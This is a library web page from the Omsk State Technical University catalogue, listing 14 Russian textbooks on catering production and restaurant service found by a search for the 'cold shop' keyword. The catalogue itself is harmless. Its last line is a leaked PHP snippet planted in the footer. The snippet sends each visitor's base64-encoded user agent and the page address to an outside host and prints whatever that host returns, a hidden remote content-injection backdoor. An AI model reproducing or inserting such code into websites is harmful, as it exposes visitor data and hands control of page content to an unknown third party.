Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

49 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ЦЕХ ХОЛОДНЫЙ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 14
1. 
Радченко Л. А. Организация производства и обслуживания на предприятиях общественного питания [Текст] / Л. А. Радченко, 2013. - 321 с.
Ключевые слова 
МЕНЮ -- ДОКУМЕНТАЦИЯ -- ОРГАНИЗАЦИЯ ТРУДА рациональная -- Нормирование труда -- РАБОЧЕЕ МЕСТО -- Цех овощной -- Цех мясной -- Цех рыбный -- Цех мясо-рыбный -- Цех доработки полуфабрикатов -- Цех обработки зелени -- Цех горячий -- Цех холодный -- Цех кондитерский -- Моечная кухонной посуды -- Бракераж -- Хлеборезка -- Срок хранения продуктов -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ПРИБОР СТОЛОВЫЙ -- БЕЛЬЕ СТОЛОВОЕ -- КАРТА ВИН -- РЕСТОРАН - ОБСУЖИВАНИЕ -- БАНКЕТ С ЧАСТИЧНЫМ ОБСЛУЖИВАНИЕМ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАНКЕТ - ЧАЙ -- СТОЛ ШВЕДСКИЙ -- ПИТАНИЕ ИНТУРИСТОВ -- ПИТАНИЕ СОЦИАЛЬНОЕ -- ПИТАНИЕ СТУДЕНТОВ -- ПИТАНИЕ УЧАЩИХСЯ -- ПИТАНИЕ РАБОЧИХ
Держатели документа (Информация об экземплярах) 
2. 
Радченко Л. А. Организация производства на предприятиях общественного питания [Текст] : учеб. для студ. образоват. учреждений сред. проф. образования / Л. А. Радченко, 2009. - 374 с.
Держатели документа (Информация об экземплярах) 
3. 
Мрыхина Е. Б. Организация производства на предприятиях общественного питания [Текст] / Е. Б. Мрыхина, 2013. - 176 с.
Ключевые слова 
ПИТАНИЕ ОБЩЕСТВЕННОЕ -- СНАБЖЕНИЕ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- ХРАНЕНИЕ ПРОДУКТОВ -- ОТПУСК ПРОДУКТОВ -- ПЛАНИРОВАНИЕ ПРОИЗВОДСТВА -- МЕНЮ -- ДОКУМЕНТАЦИЯ НОРМАТИВНАЯ -- ОРГАНИЗАЦИЯ ТРУДА НАУЧНАЯ -- НОРМИРОВАНИЕ ТРУДА -- ОРГАНИЗАЦИЯ ПРОИЗВОДСТВА -- ЦЕХ ЗАГОТОВОЧНЫЙ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСО-РЫБНЫЙ -- ЦЕХ КУЛИНАРНЫЙ -- ЦЕХ КОНДИТЕРСКИЙ -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ ОБРАБОТКИ ЗЕЛЕНИ -- ЦЕХ ХОЛОДНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ПОСУДОМОЕЧНАЯ -- ХЛЕБОРЕЗКА -- РЕАЛИЗАЦИЯ ПРОДУКЦИИ
Держатели документа (Информация об экземплярах) 
4. 
Мальгина С. Ю. Организация работы структурного подразделения предприятий общественного питания [Текст] / С. Ю. Мальгина, Ю. Н. Плешкова, 2014. - 320 с.
Ключевые слова 
ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ -- ПОКАЗАТЕЛИ ПРОИЗВОДСТВА -- ПРОГРАММА ПРОИЗВОДСТВЕННАЯ -- ПЛАН ТОВАРООБОРОТА -- ТОВАРООБОРОТ - ОБЩЕСТВЕННОЕ ПИТАНИЕ -- ВЫПУСК ПРОДУКЦИИ -- РЕАЛИЗАЦИЯ ПРОДУКЦИИ -- МОЩНОСТЬ ПРОИЗВОДСТВЕННАЯ -- ЭФФЕКТИВНОСТЬ ПРЕДПРИЯТИЯ -- ЗАТРАТЫ ПРЕДПРИЯТИЯ -- ПРИБЫЛЬ ПРОИЗВОДСТВА -- РЕНТАБЕЛЬНОСТЬ ПРЕДПРИЯТИЯ -- ОРГАНИЗАЦИЯ ПРОИЗВОДСТВА - ОБЩЕСТВЕННОЕ ПИТАНИЕ -- ЦЕХ ПРОИЗВОДСТВЕННЫЙ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ПТИЦЕГОЛЬЕВОЙ -- ЦЕХ МЯСО-РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ЦЕХ КУЛИНАРНЫЙ -- ЦЕХ КОНДИТЕРСКИЙ -- ЦЕХ МУЧНЫХ ИЗДЕЛИЙ -- ЛИНИЯ РАЗДАТОЧНАЯ -- РАЗДАТОЧНАЯ -- ОРГАНИЗАЦИЯ РАБОТЫ -- КОЛЛЕКТИВ ТРУДОВОЙ -- ОБУЧЕНИЕ ПЕРСОНАЛА -- ОХРАНА ТРУДА - ОБЩЕСТВЕННОЕ ПТИАНИЕ -- БЕЗОПАСНОСТЬ ПРОДУКЦИИ ПИЩЕВОЙ -- КАЧЕСТВО ПРОДУКЦИИ КОНДИТЕРСКОЙ -- ДОКУМЕНТИРОВАНИЕ УПРАВЛЕНЧЕСКОЙ ДЕЯТЕЛЬНОСТИ -- ПИТАНИЕ ОБЩЕСТВЕННОЕ - ДОКУМЕНТЫ -- ПИТАНИЕ ОБЩЕСТВЕННОЕ - УЧЕТ
Держатели документа (Информация об экземплярах) 
5. 
Радченко Л. А. Организация производства на предприятиях общественного питания [Текст] / Л. А. Радченко, 2009. - 374 с.
Держатели документа (Информация об экземплярах) 
6. 
Главчева С. И. Организация производства и обслуживание в ресторанах и барах [Текст] / С. И. Главчева, Л. Е. Чередниченко, 2012. - 205 с.
Ключевые слова 
ПИТАНИЕ ОБЩЕСТВЕННОЕ -- БИЗНЕС РЕСТОРАННЫЙ -- РЕСТОРАЦИЯ РУССКАЯ -- РЕСТОРАЦИЯ ЗАРУБЕЖНАЯ -- РЕСТОРАН - ИСТОРИЯ -- РЕСТОРАН -- БАР -- ПОСУДА СТОЛОВАЯ -- ПОСУДА ФАРФОРОВАЯ -- ПОСУДА ФАЯНСОВАЯ -- ПОСУДА ХРУСТАЛЬНАЯ -- ПОСУДА СТЕКЛЯННАЯ -- ПОСУДА МЕТАЛИЧЕСКАЯ -- БЕЛЬЕ СТОЛОВОЕ -- СЕРВИРОВКА СТОЛА -- ОРГАНИЗАЦИЯ ПРОИЗВОДСТВА -- ЦЕХ ДОГОТОВКИ -- ЦЕХ ОБРАБОТКИ ЗЕЛЕНИ -- ОРГАНИЗАЦИЯ ТРУДА -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ОРГАНИЗАЦИЯ ОБСЛУЖИВАНИЯ -- ВСТРЕЧА ПОТРЕБИТЕЛЕЙ -- ПРИЕМ ЗАКАЗА -- РАСЧЕТ С ПОСЕТИТЕЛЯМИ -- ЗАМЕНА ПОСУДЫ -- МЕНЮ РЕСТОРАНА -- КАРТА ВИН -- КАРТА СИГАРНАЯ -- КАРТА КАЛЬЯННАЯ -- КАЛЬЯН -- ПОДАЧА БЛЮД -- БАНКЕТ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- КОФЕ - BREAK -- БАНКЕТ - ЧАЙ -- ФОНДЮ -- СТОЛ ШВЕДСКИЙ -- ОБСЛУЖИВАНИЕ ПРАЗДНИЧНЫХ ВЕЧЕРОВ -- КЕЙТЕРИНГ -- ПЕРСОНАЛ ОБСЛУЖИВАЮЩИЙ -- ПЕРСОНАЛ РЕСТОРАНА -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- БАРМЕН

В учебном пособии описана организация обслуживания потребителей в ресторанах и барах с учетом современных требований рынка, отечественного и зарубежного опыта, рассмотрены особенности проведения различных мероприятий и банкетов. Представлена организация проведения новых видов обслуживания по типу «сырной тележки», кейтеринга, предложены примеры написания винной, сигаретной, коньячной и кальянной карт. Приведены описания состава и организации работы производственных помещений и помещений для потребителей, их оснащения современным оборудованием, мебелью, а также характеристика различных видов ресторанной и барной посуды и белья.

Пособие предназначено для студентов вузов, а также работников предприятий общественного питания.

7. 
Радченко Л. А. Организация производства на предприятиях общественного питания [Текст] : учеб. для студ. образоват. учреждений сред. проф. образования / Л. А. Радченко, 2007. - 374 с.
Держатели документа (Информация об экземплярах) 
8. 
Мрыхина Е. Б. Организация производства на предприятиях общественного питания [Текст] : учеб. пособие для студ. сред. проф. образования / Е. Б. Мрыхина, 2007. - 176 с.
Ключевые слова 
ПИТАНИЕ ОБЩЕСТВЕННОЕ -- СНАБЖЕНИЕ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- ХРАНЕНИЕ ПРОДУКТОВ -- ОТПУСК ПРОДУКТОВ -- ПЛАНИРОВАНИЕ ПРОИЗВОДСТВА -- МЕНЮ -- ДОКУМЕНТАЦИЯ НОРМАТИВНАЯ -- ОРГАНИЗАЦИЯ ТРУДА НАУЧНАЯ -- НОРМИРОВАНИЕ ТРУДА -- ОРГАНИЗАЦИЯ ПРОИЗВОДСТВА -- ЦЕХ ЗАГОТОВОЧНЫЙ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСО-РЫБНЫЙ -- ЦЕХ КУЛИНАРНЫЙ -- ЦЕХ КОНДИТЕРСКИЙ -- ЦЕХ ДОРАБОТКИ ПОЛУФАБРИКАТОВ -- ЦЕХ ОБРАБОТКИ ЗЕЛЕНИ -- ЦЕХ ХОЛОДНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ПОСУДОМОЕЧНАЯ -- ХЛЕБОРЕЗКА -- РЕАЛИЗАЦИЯ ПРОДУКЦИИ
Держатели документа (Информация об экземплярах) 
9. 
Официант-бармен от А до Я [Текст] : справочное издание, 2002. - 223 с.
Ключевые слова 
РЕСТОРАН -- Кафе -- БАР -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСО-РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ЦЕХ КОНДИТЕРСКИЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- Раздаточная -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ИНТЕРЬЕР РЕСТОРАНА -- ОБОРУДОВАНИЕ ЗАЛА РЕСТОРАНА -- БУФЕТ -- Касса -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- ПРИБОР СТОЛОВЫЙ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- СЕРВИРОВКА -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- БАНКЕТ- прием -- БАНКЕТ - ЧАЙ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БУФЕТ-бар -- ОБСЛУЖИВАНИЕ интуристов -- СПРОС ПОТРЕБИТЕЛЬСКИЙ -- РЕСТОРАН - реклама -- общепит - охрана труда -- ТЕХНИКА БЕЗОПАСНОСТИ -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ
Держатели документа (Информация об экземплярах) 
10. 
Организация производства на предприятиях общественного питания [Текст] : Учеб. пособие для студ. учеб. заведений сред. проф. образования / Авт.-сост. Л. А. Радченко; Под ред. С. Н. Белоусовой, 2001. - 345 с.
Держатели документа (Информация об экземплярах) 
11. 
Барановский В. А. Официант-бармен [Текст] : учеб. пособие для учащихся учеб. заведений начального проф. образования / В. А. Барановский, Л. В. Кулькова, 2002. - 347 с.
Ключевые слова 
ОФИЦИАНТ-бармен -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ИНТЕРЬЕР РЕСТОРАНА -- БУФЕТ -- БАР -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- СЕРВИРОВКА СТОЛА -- КУЛЬТУРА ПОВЕДЕНИЯ официанта -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- БАНКЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ- ПРИЕМ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАРМЕН -- БУФЕТ бар -- Банкет с частичным обслуживанием -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ алжирская -- Кухня английская -- Кухня американская -- Кухня канадская -- Кухня арабская -- Кухня болгарская -- Кухня югославская -- Кухня венгерская -- Кухня индийская -- Кухня иранская -- Кухня итальянская -- Кухня немецкая -- Кухня польская -- Кухня румынская -- Кухня скандинавская -- КУХНЯ ФРАНЦУЗСКАЯ -- Кухня чешская -- Кухня южноамериканская -- Кухня японская -- РЕКЛАМА - РЕСТОРАН -- ОХРАНА ТРУДА
12. 
Извекова В. Г. Бармен, официант [Текст] : учеб. пособие: соответствует Гос. образоват. стандарту РФ / В. Г. Извекова, 2004. - 319 с.
Ключевые слова 
ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ПРИБОР СТОЛОВЫЙ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ЦЕХ КОНДИТЕРСКИЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- СКЛАД -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- СЕРВИЗНАЯ -- МЕНЮ -- КАРТА ВИН -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- КЕЙТЕРИНГ -- БАНКЕТ -- ПРИЕМ -- БУФЕТ -- БАР -- ДЕСЕРТ - БАР -- Пиво -- ПОСУДА стеклянная -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- РЕКЛАМА - РЕСТОРАН
Держатели документа (Информация об экземплярах) 
13. 
Радченко Л. А. Организация производства на предприятиях общественного питания [Текст] : учеб. для студ. образоват. учреждений сред. проф. образования / Л. А. Радченко, 2005. - 347 с.
Держатели документа (Информация об экземплярах) 
14. 
Организация производства на предприятиях общественного питания [Текст] : Учеб. пособие для учеб. заведений сред. проф. образования и учеб. заведений начал. проф. образования / Под ред. Белоусовой С. Н., 2000. - 345 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3183 - 26.02.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.66 с.12 запросов, 1.44c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;